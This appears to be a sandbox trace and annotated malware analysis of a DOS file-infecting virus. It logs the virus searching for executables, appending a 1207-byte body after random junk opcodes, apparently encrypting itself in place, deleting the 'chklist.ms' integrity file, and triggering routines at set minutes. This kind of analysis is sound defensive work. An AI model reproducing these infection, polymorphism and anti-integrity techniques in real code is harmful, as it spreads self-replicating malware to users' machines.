2018-12-17T22:48:46.918063174Z 59 PC: 152c0 | Change current directory
2018-12-17T22:48:46.921045927Z 59 PC: 152c0 | Change current directory
2018-12-17T22:48:46.923388033Z 14 PC: 151f2 | Set default drive (Drive = 'E')
2018-12-17T22:48:46.92434539Z 59 PC: 152c0 | Change current directory
2018-12-17T22:48:46.927395075Z 14 PC: 15218 | Set default drive (Drive = 'A')
2018-12-17T22:48:46.928332385Z 59 PC: 15220 | Change current directory
2018-12-17T22:48:46.931041647Z 44 PC: 1523c | Get time 0x1523c: cmp cl, 5
0x1523f: jne 0x15244
0x15241: call 0x1534a
0x15244: cmp cl, 0xd
0x15247: jne 0x1524c
0x15249: call 0x15359
0x1524c: cmp cl, 0x1e
0x1524f: jne 0x15258
0x15251: lea dx, word ptr [bp + 0x290]
0x15255: call 0x15330
0x15258: cmp cl, 0x28
0x1525b: jne 0x15264
0x1525d: lea dx, word ptr [bp + 0x290]
0x15261: call 0x15330
0x15264: cmp cl, 0x32
0x15267: jne 0x15270
0x15269: lea dx, word ptr [bp + 0x2c7]
0x1526d: call 0x15330
0x15270: lea si, word ptr [bp + 0x195]
0x15274: lea di, word ptr [bp + 0x18d]
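2018-12-17T22:48:46.945325698Z 53 PC: 14fba | Get interrupt vector (Interrupt = '0' AKA 'Program terminate') [Note: in this and the following Get/Set interrupt vector entries the 'AKA' text is the name of the INT 21h function that has the same decimal number, not the name of the interrupt vector being read or written. The number is the vector: for example 36 is vector 0x24 (the DOS critical-error handler) and 35 is vector 0x23 (the Ctrl-Break handler).]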
2018-12-17T22:48:46.946247075Z 53 PC: 14fba | Get interrupt vector (Interrupt = '2' AKA 'Character output')
2018-12-17T22:48:46.947319108Z 53 PC: 14fba | Get interrupt vector (Interrupt = '27' AKA 'Get allocation info for default drive')
2018-12-17T22:48:46.948583483Z 53 PC: 14fba | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:48:46.949509332Z 53 PC: 14fba | Get interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-17T22:48:46.951013Z 53 PC: 14fba | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:48:46.952189635Z 53 PC: 14fba | Get interrupt vector (Interrupt = '52' AKA 'Get InDOS flag pointer')
2018-12-17T22:48:46.95322374Z 53 PC: 14fba | Get interrupt vector (Interrupt = '53' AKA 'Get interrupt vector')
2018-12-17T22:48:46.954761261Z 53 PC: 14fba | Get interrupt vector (Interrupt = '54' AKA 'Get free disk space')
2018-12-17T22:48:46.955934586Z 53 PC: 14fba | Get interrupt vector (Interrupt = '55' AKA 'Get or set switch character')
2018-12-17T22:48:46.957088818Z 53 PC: 14fba | Get interrupt vector (Interrupt = '56' AKA 'Get or set country info')
2018-12-17T22:48:46.958803255Z 53 PC: 14fba | Get interrupt vector (Interrupt = '57' AKA 'Create subdirectory')
2018-12-17T22:48:46.960304479Z 53 PC: 14fba | Get interrupt vector (Interrupt = '58' AKA 'Remove subdirectory')
2018-12-17T22:48:46.961441716Z 53 PC: 14fba | Get interrupt vector (Interrupt = '59' AKA 'Change current directory')
2018-12-17T22:48:46.963250434Z 53 PC: 14fba | Get interrupt vector (Interrupt = '60' AKA 'Create or truncate file')
2018-12-17T22:48:46.964811191Z 53 PC: 14fba | Get interrupt vector (Interrupt = '61' AKA 'Open file')
2018-12-17T22:48:46.966326316Z 53 PC: 14fba | Get interrupt vector (Interrupt = '62' AKA 'Close file')
2018-12-17T22:48:46.968696381Z 53 PC: 14fba | Get interrupt vector (Interrupt = '63' AKA 'Read file or device')
2018-12-17T22:48:46.969729348Z 53 PC: 14fba | Get interrupt vector (Interrupt = '117' AKA 'UNKNOWN!')
2018-12-17T22:48:46.970700937Z 37 PC: 14fcf | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-17T22:48:46.973194924Z 37 PC: 14fd7 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-17T22:48:46.974389188Z 37 PC: 14fdf | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:48:46.975562124Z 37 PC: 14fe7 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device')
2018-12-17T22:48:46.977798291Z 68 PC: 15eab | I/O control for devices (Set for = '� ��O�Э:E�t��ҭ3ɬ� �u��ŝ]_^ZY[�P�/��t�\�ЭXâЭX�SQRWV�������6έ�6̭�6ʭ2ɬ �t:�t��t�����2ɪ���6έ��3����t!�Э �u:E�t��� �u�����}��')
2018-12-17T22:48:47.156716005Z 64 PC: 1563b | Write file or device (Write 0 bytes on handle 1)
2018-12-17T22:48:47.158486561Z 37 PC: 15111 | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-17T22:48:47.160183142Z 37 PC: 15111 | Set interrupt vector (Interrupt = '2' AKA 'Character output')
2018-12-17T22:48:47.161296707Z 37 PC: 15111 | Set interrupt vector (Interrupt = '27' AKA 'Get allocation info for default drive')
2018-12-17T22:48:47.162365342Z 37 PC: 15111 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:48:47.163777092Z 37 PC: 15111 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-17T22:48:47.164819867Z 37 PC: 15111 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:48:47.166104223Z 37 PC: 15111 | Set interrupt vector (Interrupt = '52' AKA 'Get InDOS flag pointer')
2018-12-17T22:48:47.167605405Z 37 PC: 15111 | Set interrupt vector (Interrupt = '53' AKA 'Get interrupt vector')
2018-12-17T22:48:47.168623988Z 37 PC: 15111 | Set interrupt vector (Interrupt = '54' AKA 'Get free disk space')
2018-12-17T22:48:47.170364397Z 37 PC: 15111 | Set interrupt vector (Interrupt = '55' AKA 'Get or set switch character')
2018-12-17T22:48:47.171368868Z 37 PC: 15111 | Set interrupt vector (Interrupt = '56' AKA 'Get or set country info')
2018-12-17T22:48:47.172302254Z 37 PC: 15111 | Set interrupt vector (Interrupt = '57' AKA 'Create subdirectory')
2018-12-17T22:48:47.173543073Z 37 PC: 15111 | Set interrupt vector (Interrupt = '58' AKA 'Remove subdirectory')
2018-12-17T22:48:47.174574677Z 37 PC: 15111 | Set interrupt vector (Interrupt = '59' AKA 'Change current directory')
2018-12-17T22:48:47.175536053Z 37 PC: 15111 | Set interrupt vector (Interrupt = '60' AKA 'Create or truncate file')
2018-12-17T22:48:47.176980571Z 37 PC: 15111 | Set interrupt vector (Interrupt = '61' AKA 'Open file')
2018-12-17T22:48:47.177940135Z 37 PC: 15111 | Set interrupt vector (Interrupt = '62' AKA 'Close file')
2018-12-17T22:48:47.179240867Z 37 PC: 15111 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device')
2018-12-17T22:48:47.180706422Z 37 PC: 15111 | Set interrupt vector (Interrupt = '117' AKA 'UNKNOWN!')
2018-12-17T22:48:47.18151738Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.182821734Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.1847466Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.186263781Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.187982377Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.19066106Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.19215816Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.193699884Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.195937491Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.197915865Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.199878607Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.202024554Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.203902089Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.205917864Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.207850125Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.209678626Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.211879381Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.21380067Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.215611153Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.217906332Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.219789325Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.221717403Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.224091076Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.226147582Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.228033003Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.2304707Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.232329514Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.234378393Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.236799536Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.239124268Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.242211437Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.245341471Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.247313242Z 6 PC: 15198 | Direct console I/O
2018-12-17T22:48:47.250837921Z 76 PC: 15150 | Terminate with return code (Return code = '200')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":9667,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:29.403489711Z 25 PC: 15198 | Get default drive
2018-12-25T12:23:29.406303396Z 71 PC: 151a7 | Get current directory
2018-12-25T12:23:29.409789603Z 26 PC: 153fd | Set disk transfer address
2018-12-25T12:23:29.411370865Z 78 PC: 15408 | Find first file
2018-12-25T12:23:29.417987906Z 67 PC: 1542b | Get or set file attributes
2018-12-25T12:23:29.42413948Z 67 PC: 15433 | Get or set file attributes
2018-12-25T12:23:29.439529399Z 61 PC: 15438 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:23:29.451109199Z 87 PC: 1543e | Get or set file date and time
2018-12-25T12:23:29.453056497Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:23:29.459587997Z 66 PC: 154a6 | Move file pointer
; Snapshot taken at the return address of an INT 21h AH=2Ch (Get time) call,
; so DX holds seconds (DH) and hundredths (DL). The first loop turns the top
; 8 bits of DX into 8 consecutive bytes starting at [bp + 0x556], each being
; 0xF8 (the CLC opcode) or 0xFC (the CLD opcode). The second loop appends 8
; more bytes, each 0x90 (NOP) or 0xF5 (CMC), from a fresh time value.
; NOTE(review): bp presumably holds the code's load offset; not visible here.
2018-12-25T12:23:29.461436063Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]  ; di = one byte before the buffer
0x15512: inc di  ; advance one byte per pass
0x15513: shl dx, 1  ; CF = next bit of the time value
0x15515: jb 0x1551e  ; bit set -> 0xFC, bit clear -> 0xF8
0x15517: mov word ptr [di], 0xf8  ; word store; its high 0x00 byte is overwritten by the next store
0x1551b: jmp 0x15522
0x1551d: nop  ; not reached: follows an unconditional jmp
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512  ; 8 passes (cx = 8)
0x15524: mov ah, 0x2c  ; Get time again for a new DX
0x15526: int 0x21
0x15528: mov cx, 8  ; second pass of 8, di keeps advancing
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop  ; not reached: follows an unconditional jmp
0x15537: mov word ptr [di], 0xf5
; Snapshot taken at the return address of the second Get time call. The loop
; fills 8 more buffer bytes with 0x90 (NOP opcode) or 0xF5 (CMC opcode), one
; per bit shifted out of DX. A third Get time then supplies the length of the
; write that follows: cx = DL & 0x0F, i.e. 0..15 bytes taken from [bp + 0x556].
; The trace row for PC 15550 records this write as 9 bytes on handle 5.
2018-12-25T12:23:29.470981297Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di  ; di continues from the earlier fill loop
0x1552c: shl dx, 1  ; CF = next bit of the time value
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop  ; not reached: follows an unconditional jmp
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c  ; Get time
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf  ; cx = low 4 bits of DL (hundredths)
0x15548: mov ah, 0x40  ; INT 21h AH=40h: write CX bytes from DS:DX to handle BX
0x1554a: lea dx, word ptr [bp + 0x556]  ; start of the buffer filled above
0x1554e: int 0x21  ; BX (file handle) is set outside this window
0x15550: jmp 0x15555  ; jumps over the three bytes that follow
0x15552: nop
0x15553: add byte ptr [bx + si], al  ; skipped by the jmp; likely data bytes decoded as code
; Snapshot taken at the return address of the third Get time call. It shows
; two file writes: a time-dependent 0..15 bytes from [bp + 0x556], then
; 0x4b7 = 1207 bytes from [bp + 0x10]. 1207 is the size in this sample's name,
; and the trace row for PC 1556c records "Write 1207 bytes on handle 5".
; NOTE(review): the routine called at 0x1555e is not shown. Its printed target
; 0x2514a lies 0x10000 above every traced PC, which may be the disassembler not
; wrapping a 16-bit near call; unconfirmed.
2018-12-25T12:23:29.473184093Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf  ; cx = low 4 bits of DL (hundredths)
0x15548: mov ah, 0x40  ; INT 21h AH=40h: write CX bytes from DS:DX to handle BX
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555  ; jumps over the three bytes that follow
0x15552: nop
0x15553: add byte ptr [bx + si], al  ; skipped by the jmp; likely data bytes decoded as code
0x15555: mov ah, 0x2c  ; Get time
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx  ; keep the time value (seconds/hundredths) at [bp + 0x30]
0x1555e: call 0x2514a  ; routine not shown in this trace
0x15561: mov ah, 0x40  ; write file
0x15563: mov cx, 0x4b7  ; 1207 bytes
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c  ; Get time
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-25T12:23:29.475262208Z 64 PC: 15550 | Write file or device (Write 9 bytes on handle 5)
; Snapshot taken at the return address of the Get time call at 0x15555, before
; the first call to 0x2514a. At this point the bytes from 0x1557e onward decode
; as ordinary code (a seek to end of file). The snapshot taken later at
; PC 15570 shows different bytes at those addresses.
; NOTE(review): the value stored at [bp + 0x30] is presumably used by the
; routine at 0x2514a; that routine is not shown, so this is unconfirmed.
2018-12-25T12:23:29.482689563Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a  ; routine not shown in this trace
0x15561: mov ah, 0x40  ; INT 21h AH=40h: write CX bytes from DS:DX to handle BX
0x15563: mov cx, 0x4b7  ; 1207 bytes
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c  ; Get time
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f  ; cx = low 6 bits of DL, i.e. 0..63
0x15577: mov ah, 0x40  ; write file; DX is not reloaded, so the buffer address is the time value itself
0x15579: int 0x21
0x1557b: call 0x2514a  ; second call to the same routine
0x1557e: mov ax, 0x4202  ; INT 21h AH=42h AL=02h: seek relative to end of file
0x15581: xor cx, cx
0x15583: xor dx, dx  ; offset CX:DX = 0
0x15585: int 0x21  ; returns the new position in DX:AX
0x15587: push ax
0x15588: mov cl, 9
2018-12-25T12:23:29.485026121Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
; Snapshot taken at the return address of the Get time call at 0x1556c, i.e.
; between the two calls to 0x2514a. Only 0x15570..0x1557b is meaningful here.
; From 0x1557e onward the bytes differ from the snapshot taken at PC 15559,
; where the same addresses read "mov ax, 0x4202 / xor cx, cx / xor dx, dx /
; int 0x21". Memory was therefore rewritten in between, and the lines below
; 0x1557b are a decode of the rewritten bytes, not of instructions that run in
; this form (iret, ljmp, out and retf are decoding artifacts).
; NOTE(review): this is consistent with 0x2514a transforming the body in place
; around the 1207-byte write and reversing it afterwards, because the trace
; resumes at PC 15587; the routine itself is not shown.
2018-12-25T12:23:29.494347167Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f  ; cx = low 6 bits of DL, i.e. 0..63
0x15577: mov ah, 0x40  ; write file; DX still holds the time value, so it is used as the buffer address
0x15579: int 0x21  ; logged at PC 1557b as a 25-byte write in this run
0x1557b: call 0x2514a  ; routine not shown in this trace
0x1557e: mov ax, word ptr [0x5b00]  ; from here on: decode of rewritten bytes, see header
0x15581: xor ax, dx
0x15583: xor bx, cx
0x15585: iret
0x15586: cmp byte ptr [bp + si - 0x58], dl
0x15589: or cx, dx
0x1558b: ljmp 0x11e0:0xc8ca
0x15590: leave
0x15591: pop dx
0x15592: cdq
0x15593: out 0x18, al
0x15595: cmp al, 0x90
0x15597: xchg ax, sp
0x15598: retf 0x2706
2018-12-25T12:23:29.496859109Z 64 PC: 1557b | Write file or device (Write 25 bytes on handle 5)
2018-12-25T12:23:29.500126984Z 66 PC: 15587 | Move file pointer
2018-12-25T12:23:29.50169507Z 66 PC: 155a8 | Move file pointer
2018-12-25T12:23:29.503454617Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-25T12:23:29.506516314Z 67 PC: 15345 | Get or set file attributes
2018-12-25T12:23:29.512205437Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-25T12:23:29.518147398Z 87 PC: 155cc | Get or set file date and time
2018-12-25T12:23:29.520115695Z 62 PC: 155d0 | Close file
2018-12-25T12:23:29.528733587Z 67 PC: 155da | Get or set file attributes
2018-12-25T12:23:29.539032849Z 79 PC: 1541f | Find next file
2018-12-25T12:23:29.541993489Z 59 PC: 152c0 | Change current directory
2018-12-25T12:23:29.545889256Z 14 PC: 151d5 | Set default drive (Drive = 'C')
2018-12-25T12:23:29.547572244Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:29.548632707Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:29.553821225Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:29.558384031Z 59 PC: 151e0 | Change current directory
2018-12-25T12:23:29.564004768Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:29.564998086Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:29.573387913Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:29.579864994Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:30.918333783Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:30.926171308Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:30.928004121Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:30.933751098Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:30.93559716Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:30.938894333Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:30.940969429Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:30.943102138Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:30.950132178Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:30.952449262Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:30.974133838Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:30.977501342Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:30.980371036Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:30.981707642Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:30.983841419Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:30.986738729Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:30.995476949Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:31.002443138Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:31.00451888Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:31.066866171Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:31.082433612Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:31.085878671Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:31.091737036Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:31.122011034Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:31.128720965Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:31.130031609Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:31.137826039Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:31.13922553Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:31.141181191Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:31.143677699Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:31.145983824Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:31.151759968Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:31.154471175Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:31.205721026Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:31.207564295Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:31.210421506Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:31.212893051Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:31.214197017Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:31.216845689Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:31.223024377Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:31.228695442Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:31.230518016Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:31.238411998Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:31.247704814Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:31.250894833Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:31.257701312Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:31.267818785Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:31.274530726Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:31.276909487Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:31.282864493Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:31.284572014Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:31.287663895Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:31.290342987Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:31.292656925Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:31.299580713Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:31.302482936Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:31.310860249Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:31.313927216Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:31.317389704Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:31.319049072Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:31.320780715Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:31.324628875Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:31.330556581Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:31.337295139Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:31.339879843Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:31.346610084Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:31.355763017Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:31.359736976Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:31.365675966Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:31.375023327Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:31.382157297Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:31.383811102Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:31.389448552Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:31.39171324Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:31.394053896Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:31.397009928Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:31.400190783Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:31.406435358Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:31.409017703Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:31.716291843Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:31.719449181Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:31.819234342Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:31.822333819Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:31.824067595Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:31.827409181Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:31.83438674Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:31.841136004Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:31.843019122Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.046499307Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.055969447Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.058824182Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.063862891Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.070996069Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.07780993Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.080580912Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.086532903Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.089038531Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.091652333Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.09492852Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.097344966Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.103989561Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.107697274Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.11556949Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.117941208Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.122003632Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.123818887Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.125428383Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.129366213Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.135185352Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.1412103Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.143742082Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.15028869Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.160326113Z 14 PC: 151e9 | Set default drive (Drive = 'D')
2018-12-25T12:23:32.162597922Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.166957162Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.170758847Z 14 PC: 151f2 | Set default drive (Drive = 'E')
2018-12-25T12:23:32.172888404Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.176773834Z 14 PC: 15218 | Set default drive (Drive = 'A')
2018-12-25T12:23:32.178082346Z 59 PC: 15220 | Change current directory
; Snapshot taken at the return address of an INT 21h AH=2Ch (Get time) call,
; where CL holds the current minute. The chain compares the minute with 5, 13,
; 30, 40 and 50 and calls a routine only on an exact match, so the observed
; behaviour depends on when the sample runs. The run records on this page carry
; "TimeBased":true, and a single sandbox run covers only one minute value.
; NOTE(review): the bodies at 0x1534a and 0x15359 are not shown. 0x15330 is
; presumably the routine behind the 'Get or set file attributes' (PC 15345) and
; 'Delete file' (PC 15349) rows of this trace, taking a file name in DX; confirm.
2018-12-25T12:23:32.182866395Z 44 PC: 1523c | Get time 0x1523c: cmp cl, 5
0x1523f: jne 0x15244
0x15241: call 0x1534a  ; minute == 5
0x15244: cmp cl, 0xd
0x15247: jne 0x1524c
0x15249: call 0x15359  ; minute == 13
0x1524c: cmp cl, 0x1e
0x1524f: jne 0x15258
0x15251: lea dx, word ptr [bp + 0x290]  ; argument for 0x15330
0x15255: call 0x15330  ; minute == 30
0x15258: cmp cl, 0x28
0x1525b: jne 0x15264
0x1525d: lea dx, word ptr [bp + 0x290]  ; same argument as for minute 30
0x15261: call 0x15330  ; minute == 40
0x15264: cmp cl, 0x32
0x15267: jne 0x15270
0x15269: lea dx, word ptr [bp + 0x2c7]  ; a different argument
0x1526d: call 0x15330  ; minute == 50
0x15270: lea si, word ptr [bp + 0x195]  ; source/destination pointers; their use is outside this window
0x15274: lea di, word ptr [bp + 0x18d]
